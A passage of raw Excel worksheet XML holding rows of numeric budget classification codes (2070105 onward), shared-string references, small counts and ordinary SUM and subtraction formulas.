        <v>0</v>
      </c>
      <c r="AK497" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AL497" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AM497" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AN497" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AO497" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AP497" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
    </row>
    <row r="498" ht="18" customHeight="1" spans="1:42">
      <c r="A498" s="10"/>
      <c r="B498" s="16" t="s">
        <v>3336</v>
      </c>
      <c r="C498" s="17">
        <v>0</v>
      </c>
      <c r="D498" s="13">
        <v>2070105</v>
      </c>
      <c r="E498" s="16" t="s">
        <v>3337</v>
      </c>
      <c r="F498" s="14">
        <f t="shared" si="214"/>
        <v>0</v>
      </c>
      <c r="G498" s="17"/>
      <c r="H498" s="17"/>
      <c r="I498" s="17"/>
      <c r="J498" s="17"/>
      <c r="K498" s="17"/>
      <c r="L498" s="17"/>
      <c r="M498" s="17"/>
      <c r="N498" s="17"/>
      <c r="O498" s="17"/>
      <c r="P498" s="17"/>
      <c r="Q498" s="17"/>
      <c r="R498" s="17"/>
      <c r="S498" s="17"/>
      <c r="T498" s="17"/>
      <c r="U498" s="17"/>
      <c r="V498" s="17"/>
      <c r="W498" s="17"/>
      <c r="X498" s="17"/>
      <c r="Y498" s="17"/>
      <c r="Z498" s="17"/>
      <c r="AA498" s="17"/>
      <c r="AB498" s="17"/>
      <c r="AC498" s="17"/>
      <c r="AD498" s="17"/>
      <c r="AE498" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AF498" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AG498" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AH498" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AI498" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AJ498" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AK498" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AL498" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AM498" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AN498" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AO498" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AP498" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
    </row>
    <row r="499" ht="18" customHeight="1" spans="1:42">
      <c r="A499" s="26"/>
      <c r="B499" s="26"/>
      <c r="C499" s="30"/>
      <c r="D499" s="10">
        <v>2070106</v>
      </c>
      <c r="E499" s="16" t="s">
        <v>3338</v>
      </c>
      <c r="F499" s="14">
        <f t="shared" si="214"/>
        <v>0</v>
      </c>
      <c r="G499" s="17"/>
      <c r="H499" s="17"/>
      <c r="I499" s="17"/>
      <c r="J499" s="17"/>
      <c r="K499" s="17"/>
      <c r="L499" s="17"/>
      <c r="M499" s="17"/>
      <c r="N499" s="17"/>
      <c r="O499" s="17"/>
      <c r="P499" s="17"/>
      <c r="Q499" s="17"/>
      <c r="R499" s="17"/>
      <c r="S499" s="17"/>
      <c r="T499" s="17"/>
      <c r="U499" s="17"/>
      <c r="V499" s="17"/>
      <c r="W499" s="17"/>
      <c r="X499" s="17"/>
      <c r="Y499" s="17"/>
      <c r="Z499" s="17"/>
      <c r="AA499" s="17"/>
      <c r="AB499" s="17"/>
      <c r="AC499" s="17"/>
      <c r="AD499" s="17"/>
      <c r="AE499" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AF499" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AG499" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AH499" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AI499" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AJ499" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AK499" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AL499" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AM499" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AN499" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AO499" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AP499" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
    </row>
    <row r="500" ht="18" customHeight="1" spans="1:42">
      <c r="A500" s="10"/>
      <c r="B500" s="10"/>
      <c r="C500" s="28"/>
      <c r="D500" s="10">
        <v>2070107</v>
      </c>
      <c r="E500" s="16" t="s">
        <v>3339</v>
      </c>
      <c r="F500" s="14">
        <f t="shared" si="214"/>
        <v>0</v>
      </c>
      <c r="G500" s="17"/>
      <c r="H500" s="17"/>
      <c r="I500" s="17"/>
      <c r="J500" s="17"/>
      <c r="K500" s="17"/>
      <c r="L500" s="17"/>
      <c r="M500" s="17"/>
      <c r="N500" s="17"/>
      <c r="O500" s="17"/>
      <c r="P500" s="17"/>
      <c r="Q500" s="17"/>
      <c r="R500" s="17"/>
      <c r="S500" s="17"/>
      <c r="T500" s="17"/>
      <c r="U500" s="17"/>
      <c r="V500" s="17"/>
      <c r="W500" s="17"/>
      <c r="X500" s="17"/>
      <c r="Y500" s="17"/>
      <c r="Z500" s="17"/>
      <c r="AA500" s="17"/>
      <c r="AB500" s="17"/>
      <c r="AC500" s="17"/>
      <c r="AD500" s="17"/>
      <c r="AE500" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AF500" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AG500" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AH500" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AI500" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AJ500" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AK500" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AL500" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AM500" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AN500" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AO500" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AP500" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
    </row>
    <row r="501" ht="18" customHeight="1" spans="1:42">
      <c r="A501" s="10"/>
      <c r="B501" s="10"/>
      <c r="C501" s="28"/>
      <c r="D501" s="10">
        <v>2070108</v>
      </c>
      <c r="E501" s="16" t="s">
        <v>3340</v>
      </c>
      <c r="F501" s="14">
        <f t="shared" si="214"/>
        <v>6</v>
      </c>
      <c r="G501" s="17">
        <v>4</v>
      </c>
      <c r="H501" s="17"/>
      <c r="I501" s="17"/>
      <c r="J501" s="17"/>
      <c r="K501" s="17"/>
      <c r="L501" s="17">
        <v>5</v>
      </c>
      <c r="M501" s="17"/>
      <c r="N501" s="17"/>
      <c r="O501" s="17">
        <v>1</v>
      </c>
      <c r="P501" s="17"/>
      <c r="Q501" s="17"/>
      <c r="R501" s="17"/>
      <c r="S501" s="17">
        <v>4</v>
      </c>
      <c r="T501" s="17"/>
      <c r="U501" s="17"/>
      <c r="V501" s="17"/>
      <c r="W501" s="17"/>
      <c r="X501" s="17">
        <v>4</v>
      </c>
      <c r="Y501" s="17"/>
      <c r="Z501" s="17"/>
      <c r="AA501" s="17">
        <v>1</v>
      </c>
      <c r="AB501" s="17"/>
      <c r="AC501" s="17"/>
      <c r="AD501" s="17"/>
      <c r="AE501" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AF501" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AG501" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AH501" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AI501" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AJ501" s="17">
        <f t="shared" si="240"/>
        <v>1</v>
      </c>
      <c r="AK501" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AL501" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AM501" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AN501" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AO501" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AP501" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
    </row>
    <row r="502" ht="18" customHeight="1" spans="1:42">
      <c r="A502" s="10"/>
      <c r="B502" s="10"/>
      <c r="C502" s="28"/>
      <c r="D502" s="10">
        <v>2070109</v>
      </c>
      <c r="E502" s="16" t="s">
        <v>3341</v>
      </c>
      <c r="F502" s="14">
        <f t="shared" si="214"/>
        <v>2</v>
      </c>
      <c r="G502" s="17"/>
      <c r="H502" s="17">
        <v>1</v>
      </c>
      <c r="I502" s="17"/>
      <c r="J502" s="17"/>
      <c r="K502" s="17"/>
      <c r="L502" s="17">
        <v>2</v>
      </c>
      <c r="M502" s="17"/>
      <c r="N502" s="17"/>
      <c r="O502" s="17"/>
      <c r="P502" s="17"/>
      <c r="Q502" s="17"/>
      <c r="R502" s="17"/>
      <c r="S502" s="17"/>
      <c r="T502" s="17">
        <v>1</v>
      </c>
      <c r="U502" s="17"/>
      <c r="V502" s="17"/>
      <c r="W502" s="17"/>
      <c r="X502" s="17">
        <v>2</v>
      </c>
      <c r="Y502" s="17"/>
      <c r="Z502" s="17"/>
      <c r="AA502" s="17"/>
      <c r="AB502" s="17"/>
      <c r="AC502" s="17"/>
      <c r="AD502" s="17"/>
      <c r="AE502" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AF502" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AG502" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AH502" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AI502" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AJ502" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AK502" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AL502" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AM502" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AN502" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AO502" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AP502" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
    </row>
    <row r="503" ht="18" customHeight="1" spans="1:42">
      <c r="A503" s="10"/>
      <c r="B503" s="10"/>
      <c r="C503" s="28"/>
      <c r="D503" s="10">
        <v>2070110</v>
      </c>
      <c r="E503" s="16" t="s">
        <v>3342</v>
      </c>
      <c r="F503" s="14">
        <f t="shared" si="214"/>
        <v>0</v>
      </c>
      <c r="G503" s="17"/>
      <c r="H503" s="17"/>
      <c r="I503" s="17"/>
      <c r="J503" s="17"/>
      <c r="K503" s="17"/>
      <c r="L503" s="17"/>
      <c r="M503" s="17"/>
      <c r="N503" s="17"/>
      <c r="O503" s="17"/>
      <c r="P503" s="17"/>
      <c r="Q503" s="17"/>
      <c r="R503" s="17"/>
      <c r="S503" s="17"/>
      <c r="T503" s="17"/>
      <c r="U503" s="17"/>
      <c r="V503" s="17"/>
      <c r="W503" s="17"/>
      <c r="X503" s="17"/>
      <c r="Y503" s="17"/>
      <c r="Z503" s="17"/>
      <c r="AA503" s="17"/>
      <c r="AB503" s="17"/>
      <c r="AC503" s="17"/>
      <c r="AD503" s="17"/>
      <c r="AE503" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AF503" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AG503" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AH503" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AI503" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AJ503" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AK503" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AL503" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AM503" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AN503" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AO503" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AP503" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
    </row>
    <row r="504" ht="18" customHeight="1" spans="1:42">
      <c r="A504" s="10"/>
      <c r="B504" s="10"/>
      <c r="C504" s="28"/>
      <c r="D504" s="10">
        <v>2070111</v>
      </c>
      <c r="E504" s="16" t="s">
        <v>3343</v>
      </c>
      <c r="F504" s="14">
        <f t="shared" si="214"/>
        <v>0</v>
      </c>
      <c r="G504" s="17"/>
      <c r="H504" s="17"/>
      <c r="I504" s="17"/>
      <c r="J504" s="17"/>
      <c r="K504" s="17"/>
      <c r="L504" s="17"/>
      <c r="M504" s="17"/>
      <c r="N504" s="17"/>
      <c r="O504" s="17"/>
      <c r="P504" s="17"/>
      <c r="Q504" s="17"/>
      <c r="R504" s="17"/>
      <c r="S504" s="17"/>
      <c r="T504" s="17"/>
      <c r="U504" s="17"/>
      <c r="V504" s="17"/>
      <c r="W504" s="17"/>
      <c r="X504" s="17"/>
      <c r="Y504" s="17"/>
      <c r="Z504" s="17"/>
      <c r="AA504" s="17"/>
      <c r="AB504" s="17"/>
      <c r="AC504" s="17"/>
      <c r="AD504" s="17"/>
      <c r="AE504" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AF504" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AG504" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AH504" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AI504" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AJ504" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AK504" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AL504" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AM504" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AN504" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AO504" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AP504" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
    </row>
    <row r="505" ht="18" customHeight="1" spans="1:42">
      <c r="A505" s="10"/>
      <c r="B505" s="10"/>
      <c r="C505" s="28"/>
      <c r="D505" s="10">
        <v>2070112</v>
      </c>
      <c r="E505" s="16" t="s">
        <v>3344</v>
      </c>
      <c r="F505" s="14">
        <f t="shared" si="214"/>
        <v>0</v>
      </c>
      <c r="G505" s="17"/>
      <c r="H505" s="17"/>
      <c r="I505" s="17"/>
      <c r="J505" s="17"/>
      <c r="K505" s="17"/>
      <c r="L505" s="17"/>
      <c r="M505" s="17"/>
      <c r="N505" s="17"/>
      <c r="O505" s="17"/>
      <c r="P505" s="17"/>
      <c r="Q505" s="17"/>
      <c r="R505" s="17"/>
      <c r="S505" s="17"/>
      <c r="T505" s="17"/>
      <c r="U505" s="17"/>
      <c r="V505" s="17"/>
      <c r="W505" s="17"/>
      <c r="X505" s="17"/>
      <c r="Y505" s="17"/>
      <c r="Z505" s="17"/>
      <c r="AA505" s="17"/>
      <c r="AB505" s="17"/>
      <c r="AC505" s="17"/>
      <c r="AD505" s="17"/>
      <c r="AE505" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AF505" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AG505" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AH505" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AI505" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AJ505" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AK505" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AL505" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AM505" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AN505" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AO505" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AP505" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
    </row>
    <row r="506" ht="18" customHeight="1" spans="1:42">
      <c r="A506" s="10"/>
      <c r="B506" s="10"/>
      <c r="C506" s="28"/>
      <c r="D506" s="10">
        <v>2070113</v>
      </c>
      <c r="E506" s="16" t="s">
        <v>3345</v>
      </c>
      <c r="F506" s="14">
        <f t="shared" si="214"/>
        <v>6</v>
      </c>
      <c r="G506" s="17"/>
      <c r="H506" s="17"/>
      <c r="I506" s="17"/>
      <c r="J506" s="17"/>
      <c r="K506" s="17"/>
      <c r="L506" s="17">
        <v>6</v>
      </c>
      <c r="M506" s="17"/>
      <c r="N506" s="17"/>
      <c r="O506" s="17"/>
      <c r="P506" s="17"/>
      <c r="Q506" s="17"/>
      <c r="R506" s="17"/>
      <c r="S506" s="17"/>
      <c r="T506" s="17"/>
      <c r="U506" s="17"/>
      <c r="V506" s="17"/>
      <c r="W506" s="17"/>
      <c r="X506" s="17">
        <v>6</v>
      </c>
      <c r="Y506" s="17"/>
      <c r="Z506" s="17"/>
      <c r="AA506" s="17"/>
      <c r="AB506" s="17"/>
      <c r="AC506" s="17"/>
      <c r="AD506" s="17"/>
      <c r="AE506" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AF506" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AG506" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AH506" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AI506" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AJ506" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AK506" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AL506" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AM506" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AN506" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AO506" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AP506" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
    </row>
    <row r="507" ht="18" customHeight="1" spans="1:42">
      <c r="A507" s="10"/>
      <c r="B507" s="10"/>
      <c r="C507" s="28"/>
      <c r="D507" s="10">
        <v>2070114</v>
      </c>
      <c r="E507" s="16" t="s">
        <v>3346</v>
      </c>
      <c r="F507" s="14">
        <f t="shared" si="214"/>
        <v>0</v>
      </c>
      <c r="G507" s="17"/>
      <c r="H507" s="17"/>
      <c r="I507" s="17"/>
      <c r="J507" s="17"/>
      <c r="K507" s="17"/>
      <c r="L507" s="17"/>
      <c r="M507" s="17"/>
      <c r="N507" s="17"/>
      <c r="O507" s="17"/>
      <c r="P507" s="17"/>
      <c r="Q507" s="17"/>
      <c r="R507" s="17"/>
      <c r="S507" s="17"/>
      <c r="T507" s="17"/>
      <c r="U507" s="17"/>
      <c r="V507" s="17"/>
      <c r="W507" s="17"/>
      <c r="X507" s="17"/>
      <c r="Y507" s="17"/>
      <c r="Z507" s="17"/>
      <c r="AA507" s="17"/>
      <c r="AB507" s="17"/>
      <c r="AC507" s="17"/>
      <c r="AD507" s="17"/>
      <c r="AE507" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AF507" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AG507" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AH507" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AI507" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AJ507" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AK507" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AL507" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AM507" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AN507" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AO507" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AP507" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
    </row>
    <row r="508" ht="18" customHeight="1" spans="1:42">
      <c r="A508" s="10"/>
      <c r="B508" s="10"/>
      <c r="C508" s="28"/>
      <c r="D508" s="10">
        <v>2070199</v>
      </c>
      <c r="E508" s="16" t="s">
        <v>3347</v>
      </c>
      <c r="F508" s="14">
        <f t="shared" si="214"/>
        <v>11</v>
      </c>
      <c r="G508" s="17"/>
      <c r="H508" s="17"/>
      <c r="I508" s="17"/>
      <c r="J508" s="17"/>
      <c r="K508" s="17"/>
      <c r="L508" s="17">
        <v>11</v>
      </c>
      <c r="M508" s="17"/>
      <c r="N508" s="17"/>
      <c r="O508" s="17"/>
      <c r="P508" s="17"/>
      <c r="Q508" s="17"/>
      <c r="R508" s="17"/>
      <c r="S508" s="17"/>
      <c r="T508" s="17"/>
      <c r="U508" s="17"/>
      <c r="V508" s="17"/>
      <c r="W508" s="17"/>
      <c r="X508" s="17">
        <v>3</v>
      </c>
      <c r="Y508" s="17"/>
      <c r="Z508" s="17"/>
      <c r="AA508" s="17"/>
      <c r="AB508" s="17"/>
      <c r="AC508" s="17"/>
      <c r="AD508" s="17"/>
      <c r="AE508" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AF508" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AG508" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AH508" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AI508" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AJ508" s="17">
        <f t="shared" si="240"/>
        <v>8</v>
      </c>
      <c r="AK508" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AL508" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AM508" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AN508" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AO508" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
      <c r="AP508" s="17">
        <f t="shared" si="240"/>
        <v>0</v>
      </c>
    </row>
    <row r="509" ht="18" customHeight="1" spans="1:42">
      <c r="A509" s="10"/>
      <c r="B509" s="10"/>
      <c r="C509" s="28"/>
      <c r="D509" s="10">
        <v>20702</v>
      </c>
      <c r="E509" s="11" t="s">
        <v>3348</v>
      </c>
      <c r="F509" s="14">
        <f t="shared" si="214"/>
        <v>0</v>
      </c>
      <c r="G509" s="12">
        <f t="shared" ref="G509:R509" si="241">SUM(G510:G516)</f>
        <v>0</v>
      </c>
      <c r="H509" s="12">
        <f t="shared" si="241"/>
        <v>0</v>
      </c>
      <c r="I509" s="12">
        <f t="shared" si="241"/>
        <v>0</v>
      </c>
      <c r="J509" s="12">
        <f t="shared" si="241"/>
        <v>0</v>
      </c>
      <c r="K509" s="12">
        <f t="shared" si="241"/>
        <v>0</v>
      </c>
      <c r="L509" s="12">
        <f t="shared" si="241"/>
        <v>0</v>
      </c>
      <c r="M509" s="12">
        <f t="shared" si="241"/>
        <v>0</v>
      </c>
      <c r="N509" s="12">
        <f t="shared" si="241"/>
        <v>0</v>
      </c>
      <c r="O509" s="12">
        <f t="shared" si="241"/>
        <v>0</v>
      </c>
      <c r="P509" s="12">
        <f t="shared" si="241"/>
        <v>0</v>
      </c>
      <c r="Q509" s="12">
        <f t="shared" si="241"/>
        <v>0</v>
      </c>
      <c r="R509" s="12">
        <f t="shared" si="241"/>
        <v>0</v>
      </c>
      <c r="S509" s="12">
        <v>0</v>
      </c>
      <c r="T509" s="12">
        <v>0</v>
      </c>
      <c r="U509" s="12">
        <v>0</v>
      </c>
      <c r="V509" s="12">
        <v>0</v>
      </c>
      <c r="W509" s="12">
        <v>0</v>
      </c>
      <c r="X509" s="12">
        <v>0</v>
      </c>
      <c r="Y509" s="12">
        <v>0</v>
      </c>
      <c r="Z509" s="12">
        <v>0</v>
      </c>
      <c r="AA509" s="12">
        <v>0</v>
      </c>
      <c r="AB509" s="12">
        <v>0</v>
      </c>
      <c r="AC509" s="12">
        <v>0</v>
      </c>
      <c r="AD509" s="12">
        <v>0</v>
      </c>
      <c r="AE509" s="12">
        <f t="shared" ref="AE509:AP509" si="242">SUM(AE510:AE516)</f>
        <v>0</v>
      </c>
      <c r="AF509" s="12">
        <f t="shared" si="242"/>
        <v>0</v>
      </c>
      <c r="AG509" s="12">
        <f t="shared" si="242"/>
        <v>0</v>
      </c>
      <c r="AH509" s="12">
        <f t="shared" si="242"/>
        <v>0</v>
      </c>
      <c r="AI509" s="12">
        <f t="shared" si="242"/>
        <v>0</v>
      </c>
      <c r="AJ509" s="12">
        <f t="shared" si="242"/>
        <v>0</v>
      </c>
      <c r="AK509" s="12">
        <f t="shared" si="242"/>
        <v>0</v>
      </c>
      <c r="AL509" s="12">
        <f t="shared" si="242"/>
        <v>0</v>
      </c>
      <c r="AM509" s="12">
        <f t="shared" si="242"/>
        <v>0</v>
      </c>
      <c r="AN509" s="12">
        <f t="shared" si="242"/>
        <v>0</v>
      </c>
      <c r="AO509" s="12">
        <f t="shared" si="242"/>
        <v>0</v>
      </c>
      <c r="AP509" s="12">
        <f t="shared" si="242"/>
        <v>0</v>
      </c>
    </row>
    <row r="510" ht="18" customHeight="1" spans="1:42">
      <c r="A510" s="10"/>
      <c r="B510" s="10"/>
      <c r="C510" s="28"/>
      <c r="D510" s="10">
        <v>2070201</v>
      </c>
      <c r="E510" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F510" s="14">
        <f t="shared" si="214"/>
        <v>0</v>
      </c>
      <c r="G510" s="17"/>
      <c r="H510" s="17"/>
      <c r="I510" s="17"/>
      <c r="J510" s="17"/>
      <c r="K510" s="17"/>
      <c r="L510" s="17"/>
      <c r="M510" s="17"/>
      <c r="N510" s="17"/>
      <c r="O510" s="17"/>
      <c r="P510" s="17"/>
      <c r="Q510" s="17"/>
      <c r="R510" s="17"/>
      <c r="S510" s="17"/>
      <c r="T510" s="17"/>
      <c r="U510" s="17"/>
      <c r="V510" s="17"/>
      <c r="W510" s="17"/>
      <c r="X510" s="17"/>
      <c r="Y510" s="17"/>
      <c r="Z510" s="17"/>
      <c r="AA510" s="17"/>
      <c r="AB510" s="17"/>
      <c r="AC510" s="17"/>
      <c r="AD510" s="17"/>
      <c r="AE510" s="17">
        <f t="shared" ref="AE510:AP516" si="243">G510-S510</f>
        <v>0</v>
      </c>
      <c r="AF510" s="17">
        <f t="shared" si="243"/>
        <v>0</v>
      </c>
      <c r="AG510" s="17">
        <f t="shared" si="243"/>
        <v>0</v>
      </c>
      <c r="AH510" s="17">
        <f t="shared" si="243"/>
        <v>0</v>
      </c>
      <c r="AI510" s="17">
        <f t="shared" si="243"/>
        <v>0</v>
      </c>
      <c r="AJ510" s="17">
        <f t="shared" si="243"/>
        <v>0</v>
      </c>
      <c r="AK510" s="17">
        <f t="shared" si="243"/>
        <v>0</v>
      </c>
      <c r="AL510" s="17">
        <f t="shared" si="243"/>
        <v>0</v>
      </c>
      <c r="AM510" s="17">
        <f t="shared" si="243"/>
        <v>0</v>
      </c>
      <c r="AN510" s="17">
        <f t="shared" si="243"/>
        <v>0</v>
      </c>
      <c r="AO510" s="17">
        <f t="shared" si="243"/>
        <v>0</v>
      </c>
      <c r="AP510" s="17">
        <f t="shared" si="243"/>
        <v>0</v>
      </c>
    </row>
    <row r="511" ht="18" customHeight="1" spans="1:42">
      <c r="A511" s="10"/>
      <c r="B511" s="10"/>
      <c r="C511" s="28"/>
      <c r="D511" s="10">
        <v>2070202</v>
      </c>
      <c r="E511" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F511" s="14">
        <f t="shared" si="214"/>
